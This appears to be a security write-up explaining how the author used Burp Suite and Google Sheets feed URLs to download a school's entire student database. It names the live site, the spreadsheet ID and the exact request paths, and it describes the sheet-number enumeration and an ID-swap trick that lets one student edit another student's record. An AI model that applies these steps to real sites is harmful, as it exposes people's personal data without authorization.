How did I download all #data of the website using API from Google Sheet

Summary

Some websites look up information of my school using database using google sheet. Basically the information on this website is saved in the sheets and students can be checked and updated their information through the student ID.
Each student can only view and update their information. If you have another student ID, you can access and edit that person’s information. But it is not the main problem.

Main Problem

Here I use Burp Suite to monitor the flow of data when sending requests to the server. After sending the search request, Api will be called from the google sheet to check and return the data if it is valid. It won’t be a problem to say if I can download all the data on the Google sheet linked by Api. I will show you how to exploit below.

ResourceResource (Urls)

• https://ithutech.github.io/thuctapsv/
• http://alomaydemtien.com/

Browser/OS

• Chorme v74.0.3729.169
• Firefox v68.0b4

How to Exploit

Urls : https://ithutech.github.io/thuctapsv/

Submit sutdent code to get request

Request on Burp

The request call Api to get data from spreadsheets.google.com host. Follow the request and text I bold if i forwad

Request 1

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/ouab0ad/public/values?alt=json&callback=jQuery3310417713507497116_1559012871270&_=1559012871271

Request 2

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/od6/public/values?alt=json&callback=jQuery3310417713507497116_1559012871268&_=1559012871269

Request 3

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/3/public/values?alt=json&callback=jQuery3310417713507497116_1559012871270&_=1559012871273

Request 4

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/Sheet3/public/values?alt=json&callback=jQuery3310417713507497116_1559012871268&_=1559012871272

Request 5

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/4/public/values?alt=json&callback=jQuery3310417713507497116_1559012871276&_=1559012871277

Request 6

/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/Sheet4/public/values?alt=json&callback=jQuery3310417713507497116_1559012871274&_=1559012871275

SpreadsheetId : 1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U

The bolded characters follow my prediction that the sheets are in the database.

On Burp you can see more clearly the application map and the request and response

Reading in Api Callback I found it has a link to a file and I guess it is a file that contains the entire database of the website

Link : https://docs.google.com/spreadsheets/d/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/pubhtml

Access to the link I can see database has 5 sheet but cannot edit or download. It is in read-only mode

But when I access from the url call api I can download it
Remove the strings after the “?” I can download the values of that page

Example

http://spreadsheets.google.com/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/3/public/values

Because I see the database with 5 sheets so changing the value of “3” from 1 to 5. I will download all data. Change type of file to .xml you can read it.

Example data i download from it

Do the same with the remaining url to download the database.